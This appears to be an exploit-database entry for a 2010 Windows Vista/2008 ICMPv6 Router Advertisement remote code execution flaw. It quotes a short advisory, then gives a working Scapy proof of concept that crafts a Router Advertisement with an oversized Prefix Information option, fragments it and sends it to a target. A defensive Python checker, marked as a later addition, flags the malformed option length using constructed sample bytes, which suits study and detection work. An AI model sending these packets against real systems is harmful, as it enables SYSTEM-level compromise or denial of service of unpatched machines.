Microsoft Windows Vista/2008 – ICMPv6 Router Advertisement Remote Code Execution

  • Author: Sumit Gwalani
    Date: 2010-02-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33594/
  • source: https://www.securityfocus.com/bid/38061/info
    
    Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
    
    An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. 
    
    
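    from scapy.all import *

    v6_dst = "<IPv6 address>"
    mac_dst = "<Mac address>"

    # Router Advertisement carrying a Prefix Information option whose length field
    # is set to 255 (RFC 4861 defines it as 4), followed by 2008 bytes of filler.
    pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)

    # Split the oversized packet into fragments that fit a 1500-byte MTU.
    l = fragment6(pkt, 1500)

    for p in l:
        sendp(Ether(dst=mac_dst)/p, iface="eth0")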
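
A defender-side check for the anomaly visible in the PoC above, added here as an example and not part of the original advisory or exploit: RFC 4861 fixes the Prefix Information option length at 4 (32 bytes), while the packet above declares 255. `check_ra` and `build_ra` are hypothetical names, the input is assumed to be the already reassembled ICMPv6 message, and the sample bytes are constructed.

```python
import struct

ICMPV6_RA = 134        # Router Advertisement message type (RFC 4861)
RA_HEADER_LEN = 16     # fixed RA fields that precede the options
OPT_PREFIX_INFO = 3    # Prefix Information option type
PREFIX_INFO_UNITS = 4  # RFC 4861: this option is always 4 x 8 = 32 bytes


def check_ra(icmp6: bytes) -> list:
    """Return findings for one reassembled ICMPv6 message (empty list = clean)."""
    findings = []
    if len(icmp6) < RA_HEADER_LEN or icmp6[0] != ICMPV6_RA:
        return findings  # not a Router Advertisement
    off = RA_HEADER_LEN
    while off < len(icmp6):
        if off + 2 > len(icmp6):
            findings.append(f"truncated option header at offset {off}")
            break
        opt_type, units = struct.unpack_from("!BB", icmp6, off)
        if units == 0:  # RFC 4861: zero-length options are invalid
            findings.append(f"option type {opt_type} has zero length")
            break
        if opt_type == OPT_PREFIX_INFO and units != PREFIX_INFO_UNITS:
            findings.append(f"prefix-info option length {units} (expected 4)")
        end = off + units * 8
        if end > len(icmp6):
            findings.append(f"option type {opt_type} overruns message by {end - len(icmp6)} bytes")
            break
        off = end
    return findings


def build_ra(prefix_units: int, filler: int = 0) -> bytes:
    """Constructed sample bytes: RA header plus one Prefix Information option.
    The checksum is left at 0; check_ra() does not verify it."""
    header = struct.pack("!BBHBBHII", ICMPV6_RA, 0, 0, 64, 0, 1800, 0, 0)
    prefix = bytes.fromhex("20010000000000000000000000000000")  # 2001::
    opt = struct.pack("!BBBBIII", OPT_PREFIX_INFO, prefix_units, 64, 0xC0, 86400, 14400, 0)
    return header + opt + prefix + b"A" * filler


if __name__ == "__main__":
    print(check_ra(build_ra(4)))          # well-formed RA
    print(check_ra(build_ra(255, 2008)))  # same option layout as the PoC above
```

The declared length of 255 units (2040 bytes) matches the 32-byte option plus the 2008 filler bytes exactly, so a bounds check alone does not flag this packet; the fixed-length rule for option type 3 does.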